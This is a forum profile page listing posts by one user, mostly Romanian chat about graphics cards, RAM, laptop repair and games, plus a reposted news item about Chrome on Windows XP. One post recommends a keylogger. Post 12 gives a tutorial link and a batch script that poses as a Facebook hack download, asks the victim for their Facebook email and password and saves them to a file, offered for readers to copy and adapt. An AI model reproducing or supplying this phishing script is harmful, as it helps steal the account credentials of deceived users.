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Everything posted by FML

  1. DDR5 ar duce mai bine in jocuri [ mai ales cele mentionate de tine ] decat DDR3 ... Pentru 300 nu stiu ce sa - ti recomand , am gasit la 500 ceva destul de bun : http://www.cel.ro/placi-video/placa-video-asus-radeon-r7-250x-2gb-ddr5-128bit-l/ .
  2. http://microprocesoare-procesoare.pricer.ro/preturi/procesor-intel-core-2-duo-e7600-box .
  3. Mood : Ganditor . Status : Incerc sa introspectez , dar e cam greu [ mult mai greu decat pare ] . Locaţie : La birou , acasa . Mănânc : Lay's Chips [ Salted ] . Beau : Suc de lamaie . Sunt îmbrăcat/ă în : casual . Ascult : TSYN . Citesc : Neowin.net . Privesc : Inapoi . Mă gândesc la : Mine . Doresc : Sa fie mai bine . Iubesc pe : Alese . Nervos/asă pe : Intamplari . Îmi lipseşte : Calmul . Abia aştept să : Termin .
  4. Baga - ti , ma si voi ceva mai chill ... https://www.youtube.com/watch?v=J1Ol6M0d9sg
  5. Cand fac si LG asta , cu seria L ?
  6. Cel mai simplu , vezi ce sloturi au fiecare .
  7. ¿ sǝıp ʎpoqou ' ʇɐɥʇ op ı ɟı ' ɐǝʎ llǝɥ ,, ˙˙˙ sǝıl ʎpoqou ' pǝʌol ǝuoʎɹǝʌǝ ɟı sǝıɹɔ ʎpoqou ' pǝɹɐɔ ǝuoʎɹǝʌǝ ɟı ,,
  8. Ala - i , ma . Macar cineva recunoaste insfarsit .
  9. Defapt , Courage si GOH ar trebui sa spuna asta ca ei ma invatasera din programare . P.S : Nu vad ce - i cu goana asta dupa postari .
  10. If you want more than that , you can try ShadowKeylogger which does what you've said earlier , I quote :
  11. Just over a year ago, Microsoft finally put Windows XP out to pasture, terminating its support for the aging OS, and encouraging users around the world to switch to its newer operating systems. That hasn't quite worked out for Microsoft, as there are still more Windows XP users than those running Windows 8 and 8.1 systems combined. All XP users remain at an increased risk from security vulnerabilities, since the OS is no longer being updated and patched. But with so many users still on XP, Google has announced that it is extending support for its popular Chrome browser on the OS. Google had previously committed to supporting Chrome on Windows XP until 'at least' April 2015, giving a full year of additional support for users who intended to eventually transition to newer operating systems. But the company has now said it "will continue to provide regular updates and security patches to Chrome on XP through the end of 2015". In a blog post, Mark Larson, Director of Engineering for Chrome, warned that "at the operating system level, computers running XP are inherently in danger of being infected by malware and viruses, making it increasingly difficult for Chrome to provide a secure browsing environment." But he added that Google wants XP users "to have the option to use a browser that's up-to-date and as safe as possible on an unsupported operating system." Despite this support extension for Chrome on Windows XP, Google still advises that all users "update to a supported, secure operating system" without delay. Source: Google Chrome Blog
  12. Watch this tutorial and try as much as possible to do the same . https://www.youtube.com/watch?v=Tzr_xCfy8FM The text from Notepad : @echo off color a title Log on cls echo ------------------------------------------------------------------------------- echo Please Enter Your Email Adress And Password From Facebook To Download The Hack. echo ------------------------------------------------------------------------------- echo. echo. cd "C:Hacked" set /p user=E-mail: set /p pass=Password: echo username="%user%" Password="%pass%" >Hacked.txt start >>Programmer Here<< exit It can be changed in any way as long as it won't be in conflict with the structure rules .
  13. Mie mi se pare super , GTA V aparut acum 3 zile pentru PC , sa aibe coduri deja .
  14. Woo - woo , un alt joc de la Frozenbyte .
  15. Cert e ca aici exista divergente si asa , d'apai cu o casuta de chat [ shoutbox , whatever ] ...
  16. Teoretic , da .
  17. Acuma ... decizia va apartine in totalitate . In primul rand , cat pot sa ceara pentru inlocuirea unui singur chip ? In al doilea rand , daca considerati ca aveti nevoie de ceva mai diferit decat ofera [ sau , ma rog , a oferit ] laptop - ul dvs . , atunci mergeti pe achizitionarea unui laptop nou . Personal , daca cel de acum si - a facut indatorirea fata de dvs . , merita reparat . Tot ca 1 opinie personala , laptop-urile imi par pe zi ce trece mai buclucase .
  18. Have fun !
  19. @Gaby , pe hartie asa este , dar eu in practica , cu memoriile RAM doar ghinion am avut ... Just in caze .
  20. Pai schimba pentru inceput HDD - ul . Daca e totul ok , si sursa e . Sper ca am reusit sa te ajut . Multa bafta .
  21. Din ce stiu eu , no way .
  22. Eu sunt sincer , ce mama sfintei zi de luni ... @mao ... te faci de ras mai rau decat ai facut - o deja .
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